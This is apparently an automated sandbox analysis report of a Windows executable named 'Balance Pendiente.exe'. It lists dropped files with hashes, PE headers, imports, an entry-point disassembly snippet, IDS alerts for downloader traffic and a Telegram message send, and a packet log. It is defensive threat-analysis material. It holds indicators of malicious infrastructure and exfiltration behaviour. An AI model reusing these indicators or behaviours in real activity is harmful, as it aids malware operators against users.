Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Users\user\Desktop\Balance Pendiente.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6656 |
Entropy (8bit): | 5.028908901377071 |
Encrypted: | false |
SSDEEP: | 96:W7GUaYNwCLuGFctpiKFlYJ8hH4RVHpwdEeY3kRlDr6dMqqyVgN738:Iygp3FcHi0xhYMR8dMqJVgN |
MD5: | 51E63A9C5D6D230EF1C421B2ECCD45DC |
SHA1: | C499CDAD5C613D71ED3F7E93360F1BBC5748C45D |
SHA-256: | CD8496A3802378391EC425DEC424A14F5D30E242F192EC4EB022D767F9A2480F |
SHA-512: | C23D713C3C834B3397C2A199490AED28F28D21F5781205C24DF5E1E32365985C8A55BE58F06979DF09222740FFA51F4DA764EBC3D912CD0C9D56AB6A33CAB522 |
Malicious: | false |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exe
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 507280 |
Entropy (8bit): | 7.58580269013346 |
Encrypted: | false |
SSDEEP: | 12288:yQeEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2J/JSJFJ8JjJcJHJQJoXJSJAhwjJTJZx:cEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2p |
MD5: | E70E71A31781B44F850A39693784CE74 |
SHA1: | CE8CF2DC1B30D5D6870CC3D374C15E1005FDC879 |
SHA-256: | A02B56B4C74424B72AE21D4737E822653E68B9762E1AEB313D81BD45ABCE39E7 |
SHA-512: | 2A7994CEC6638F7FF523358E7DF0BFDDAD0F2ABAEF89E598455E9F0B7A44009E139AC9F9AFD7AC38377ED302727C5C75322327B8FABF0B450835CDBB5C52A9A8 |
Malicious: | true |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exe:Zone.Identifier
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | true |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Brnaba.txt
Process: | C:\Users\user\Desktop\Balance Pendiente.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 357 |
Entropy (8bit): | 4.322293998459369 |
Encrypted: | false |
SSDEEP: | 6:PLZOEA1KHK56RTYPCl0ic0BTgcNDuARfKQfOwVBbvmF00aLdT4F+6/EB+OHeWhkb:P8HnPel/PMARfKnwVBbvmAhT4F+6TIkb |
MD5: | ACED15FD55D311D663ECC7B5F386B8E2 |
SHA1: | A7F36FD33206209CB0E5E39643EC8C6773D5ED3B |
SHA-256: | 16FDDF0D82AA1263194FE7C92459A6CF21DDDB1F1AE5A4E5A099865DB126614F |
SHA-512: | 7F27A00EDA246719E5F8FA521AC9499002DFDB36F6E661E13797C863520D84D14F43B5F717B176BBBEFCB4B62B671A14292C59DF288C55628CA08868BBCCFBD3 |
Malicious: | false |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122
Process: | C:\Users\user\Desktop\Balance Pendiente.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60368 |
Entropy (8bit): | 5.280991252251336 |
Encrypted: | false |
SSDEEP: | 1536:IuWZnBGyJTf6U1uxBx174Nsp/0PjUt5hYlH:ULvTf/1uHNcj6XYt |
MD5: | 798E71F2FB7AECCBF532D4B9C7484B56 |
SHA1: | D22784524AC6412395F51A3FD3FE0CFBA04F034C |
SHA-256: | 1669D04C0289873AA79409AC3522A90CE116740F52C11EB8833AAF5C8908ACB8 |
SHA-512: | 29F868A51AC1B4C25A4A7D1FAD093E6FCCC3ADC762F8FA791C8E728AAF16A26CE0E43CDF45F955D0152D94CCFF514776426BFB9A088CEBF77EF9521A642606BF |
Malicious: | false |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Unloveliest183.jpg
Process: | C:\Users\user\Desktop\Balance Pendiente.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 7357 |
Entropy (8bit): | 7.91945978739656 |
Encrypted: | false |
SSDEEP: | 192:LqBD2cMKYD6M3QJxtEns0OU16nK3HXJ2UgU:eBDnM6MgDtEEUknqYUL |
MD5: | F32B2F6007A74312B5F0CB1AA5B26680 |
SHA1: | BC3DC7EB50EFA53CE2FC46A32C5F995048BD85B3 |
SHA-256: | 2CB79365771956854ACEAD63102B019737F5C99A5A10DA94D2969638CC23E825 |
SHA-512: | EBE3120E79D07F3D1D775940ADF00E099AFD6F3273D49C2D600FEE1ACE2C175C9E01CBE9EB3D83EF7D033F129C5D562983F19B1D7CD327763A92E9A246EB94F3 |
Malicious: | false |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Yderredens102.Kan
Process: | C:\Users\user\Desktop\Balance Pendiente.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 338276 |
Entropy (8bit): | 7.671083634160716 |
Encrypted: | false |
SSDEEP: | 6144:WWxwim+hZhU4Cb/9U5usu4LX4Ev0P+sDBG6IzhV8ulhplMjNzxU9l:WWxrPhxY9su+IBGsDI9qEQxUH |
MD5: | A4DD91D5ACFA3D8154510A16A27792DF |
SHA1: | 7F797BEECC8609A7B617A7CCD6BA8A335D475A47 |
SHA-256: | 5AE90EE62220502C1041B177854398C94B9F42F6115CE6FCA120B7C0702C0286 |
SHA-512: | 8F119081CF9625F036AC4783A7D127D25E8BF82BC6FEBE804EDAC2D18B71B9E85AB2C26CB04AA1A28A47CC1D49BD0676D486FEA917CA872B7C2E43A6AF889C07 |
Malicious: | false |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\blinkenberg.txt
Process: | C:\Users\user\Desktop\Balance Pendiente.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 188 |
Entropy (8bit): | 4.482002609682535 |
Encrypted: | false |
SSDEEP: | 3:jNgLDK9OujIcBAVar8kQWgQQXTzMTBWAQ2qQJCTgLck/xLCmSoTKA9jsqdn:WEOnwfoOVm0tnNwTOdg295dn |
MD5: | 2B51E420AA9188A74DB9D853C1225B5C |
SHA1: | B1AA913BBE9C576F1C7917AE2E18F4F5C4B54164 |
SHA-256: | FA760065782306B4B9E082086166D25EADA402A3332C771C48F4EDE9D5DC7E53 |
SHA-512: | 574581B87211289CC809F0BF97E968E5BC070C95B20E92ADC4315404A3E632754291BBE3B3AF1894441855BD25C797FF52ADF968DC0A73F710F199017CAF37E6 |
Malicious: | false |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\fllesbrn.txt
Process: | C:\Users\user\Desktop\Balance Pendiente.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 279 |
Entropy (8bit): | 4.994626166298632 |
Encrypted: | false |
SSDEEP: | 6:2/r0IwOQPFeBmRaaBO/XJLgDj/GZowKblJBQVAL6Ab9xu+b1:2A9OQYYJO/XuGZjKJJiVu6AbT5R |
MD5: | 6620E9C5C35F1FEAAFC525A49FF31080 |
SHA1: | 969AB64F04BCDCAB9088F1F2FA6A8209DB33E8FD |
SHA-256: | FCD285BFF12244DA3CF356243BEACEB8DB8B2868320D371D1059408AD02A0CAA |
SHA-512: | A3238FD4843C3407CD07C014444F2557D7064F53A074F58BE97230A7CC7D81E0C7D09DD25B9110C5568466E2F9AA10EB11129ED143E07F63763EB5FE3DA75ED9 |
Malicious: | false |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\sensible.jpg
Process: | C:\Users\user\Desktop\Balance Pendiente.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 32639 |
Entropy (8bit): | 7.9475019669336495 |
Encrypted: | false |
SSDEEP: | 768:6+UnjpGM4h/Q0kf7jWCXOi/vWYjc/Gv33xxMatfqxi/fftvoEP:6+UjpB4K0kjjWKOi/vWYjOUHXtfqAXvP |
MD5: | 86647E5BC7C82F155C5CB0EC05F40E9F |
SHA1: | E0946F26733AA05FCEAE067377622C083AF88C8D |
SHA-256: | 6D1974E15C49647F2BA907D7D233CB04D2F9D9C77CFB6B4255B577FE95D54B19 |
SHA-512: | 7C812D119382C9135195DDD18106FC6B465982D36C7815680C52DE2C0A40DC8E569FFBF32E87AF8BA10A71670A01CAB30D0D36CE49DB599473EC10CDACEFF992 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.58580269013346 |
TrID: |
|
File name: | Balance Pendiente.exe |
File size: | 507'280 bytes |
MD5: | e70e71a31781b44f850a39693784ce74 |
SHA1: | ce8cf2dc1b30d5d6870cc3d374c15e1005fdc879 |
SHA256: | a02b56b4c74424b72ae21d4737e822653e68b9762e1aeb313d81bd45abce39e7 |
SHA512: | 2a7994cec6638f7ff523358e7df0bfddad0f2abaef89e598455e9f0b7a44009e139ac9f9afd7ac38377ed302727c5c75322327b8fabf0b450835cdbb5c52a9a8 |
SSDEEP: | 12288:yQeEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2J/JSJFJ8JjJcJHJQJoXJSJAhwjJTJZx:cEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2p |
TLSH: | 33B4F1A37286E5E7F4560CF4CC299AF993A2ED01D9D85503F184BF2F387366245250AF |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................\...........0.......p....@ |
Icon Hash: | 371f9d96cb0d1703 |
Entrypoint: | 0x4030b8 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x52BA66A9 [Wed Dec 25 05:01:29 2013 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | e160ef8e55bb9d162da4e266afd9eef3 |
Signature Valid: | false |
Signature Issuer: | CN=Breweries, E=Skrmblomstede@Tredjeprmier.Sh, O=Breweries, L=Somersworth, OU="Tyktarmsoperations Kaalhoved tilblivelsens ", S=New Hampshire, C=US |
Signature Validation Error: | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider |
Error Number: | -2146762487 |
Version: | 3 |
Thumbprint MD5: | 92807D7374421D79A823FA7ACA6FF4C6 |
Thumbprint SHA-1: | 05F5583BAAEA1B3C4E6C4B87EF108D1468F3E327 |
Thumbprint SHA-256: | E8C65A4CB80B655AEF4C0D07A3D407B6265C0EC80F62EE79AC5291A245D3AEA2 |
Serial: | 391A08F4CFA8FACE743EC806DF49200A45DD1E7D |
Instruction |
---|
sub esp, 00000184h |
push ebx |
push ebp |
push esi |
xor ebx, ebx |
push edi |
mov dword ptr [esp+18h], ebx |
mov dword ptr [esp+10h], 00409190h |
mov dword ptr [esp+20h], ebx |
mov byte ptr [esp+14h], 00000020h |
call dword ptr [00407034h] |
push 00008001h |
call dword ptr [0040711Ch] |
push ebx |
call dword ptr [0040728Ch] |
push 00000008h |
mov dword ptr [00423778h], eax |
call 00007F773490ADCAh |
mov dword ptr [004236C4h], eax |
push ebx |
lea eax, dword ptr [esp+38h] |
push 00000160h |
push eax |
push ebx |
push 0041EC80h |
call dword ptr [00407164h] |
push 00409180h |
push 00422EC0h |
call 00007F773490AA74h |
call dword ptr [00407120h] |
mov ebp, 00429000h |
push eax |
push ebp |
call 00007F773490AA62h |
push ebx |
call dword ptr [00407118h] |
cmp byte ptr [00429000h], 00000022h |
mov dword ptr [004236C0h], eax |
mov eax, ebp |
jne 00007F773490803Ch |
mov byte ptr [esp+14h], 00000022h |
mov eax, 00429001h |
push dword ptr [esp+14h] |
push eax |
call 00007F773490A4F2h |
push eax |
call dword ptr [00407220h] |
mov dword ptr [esp+1Ch], eax |
jmp 00007F77349080F5h |
cmp cl, 00000020h |
jne 00007F7734908038h |
inc eax |
cmp byte ptr [eax], 00000020h |
je 00007F773490802Ch |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x36000 | 0x18a50 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x7b610 | 0x780 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x5a6a | 0x5c00 | 8781c451557a4626018483faabe438d0 | False | 0.6614724864130435 | data | 6.417713695663469 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x7000 | 0x11ce | 0x1200 | 640f709ec19b4ed0455a4c64e5934d5e | False | 0.4520399305555556 | OpenPGP Secret Key | 5.23558258677739 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x9000 | 0x1a7b8 | 0x400 | c9a433d4fe67308d6a5942cfb667cbe7 | False | 0.5986328125 | data | 4.862130355383113 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x24000 | 0x12000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x36000 | 0x18a50 | 0x18c00 | ae1da6d52c6b9db5a72bcee2295c6945 | False | 0.3393604008838384 | data | 4.6330392279203245 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x36448 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.2523660238968414 |
RT_ICON | 0x46c70 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.4220954356846473 |
RT_ICON | 0x49218 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.49343339587242024 |
RT_ICON | 0x4a2c0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.5876865671641791 |
RT_ICON | 0x4b168 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States | 0.5450819672131147 |
RT_ICON | 0x4baf0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.7319494584837545 |
RT_ICON | 0x4c398 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | English | United States | 0.7811059907834101 |
RT_ICON | 0x4ca60 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | English | United States | 0.47804878048780486 |
RT_ICON | 0x4d0c8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.7095375722543352 |
RT_ICON | 0x4d630 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.6879432624113475 |
RT_ICON | 0x4da98 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.5551075268817204 |
RT_ICON | 0x4dd80 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 0 | English | United States | 0.6086065573770492 |
RT_ICON | 0x4df68 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.6993243243243243 |
RT_DIALOG | 0x4e090 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0x4e190 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x4e2b0 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0x4e378 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x4e3d8 | 0xbc | data | English | United States | 0.601063829787234 |
RT_VERSION | 0x4e498 | 0x2b0 | data | English | United States | 0.5058139534883721 |
RT_MANIFEST | 0x4e748 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984 |
DLL | Import |
---|---|
KERNEL32.dll | GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, Sleep, CloseHandle, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, SetErrorMode, GetCommandLineA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary |
USER32.dll | CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA |
ADVAPI32.dll | RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA |
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize |
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA |
Description | Data |
---|---|
Comments | forskningslederen phon |
CompanyName | influenzaepidemiens doktoren |
FileVersion | 2.4.0.0 |
InternalName | nadvergst.exe |
LegalCopyright | bimahs weensier spildevandsledningernes |
LegalTrademarks | intensiveringernes |
Translation | 0x0409 0x04e4 |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-02-25T08:27:35.888216+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49770 | 172.217.18.14 | 443 | TCP |
2025-02-25T08:27:41.175108+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49812 | 158.101.44.242 | 80 | TCP |
2025-02-25T08:27:42.581340+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49812 | 158.101.44.242 | 80 | TCP |
2025-02-25T08:27:43.138773+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49828 | 104.21.96.1 | 443 | TCP |
2025-02-25T08:27:43.800116+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49830 | 158.101.44.242 | 80 | TCP |
2025-02-25T08:27:45.588203+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49848 | 104.21.96.1 | 443 | TCP |
2025-02-25T08:27:46.775686+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49855 | 104.21.96.1 | 443 | TCP |
2025-02-25T08:27:53.628181+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49905 | 149.154.167.220 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 25, 2025 08:27:39.525801897 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.531481028 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.531614065 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.531627893 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.531708956 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.537281036 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.537945986 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.537976027 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.538068056 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.542052984 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.542149067 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.542165041 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.542215109 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.546552896 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.546647072 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.546669960 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.546741962 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.550940990 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.551018953 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.551079988 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.551136017 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.555244923 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.555341959 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.555392027 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.555550098 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.559237957 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.559324026 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.559350967 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.559413910 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.559437037 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.559499979 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.559521914 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.559577942 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.563487053 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.563622952 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.563638926 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.563699007 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.567259073 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.567311049 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.567365885 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.567451954 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.580547094 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.580727100 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.580780983 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.580781937 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.580804110 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.580857038 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.580862999 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.580899954 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.580904961 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.581022024 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.581027031 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.581073046 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.581197023 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.581437111 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.581444979 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
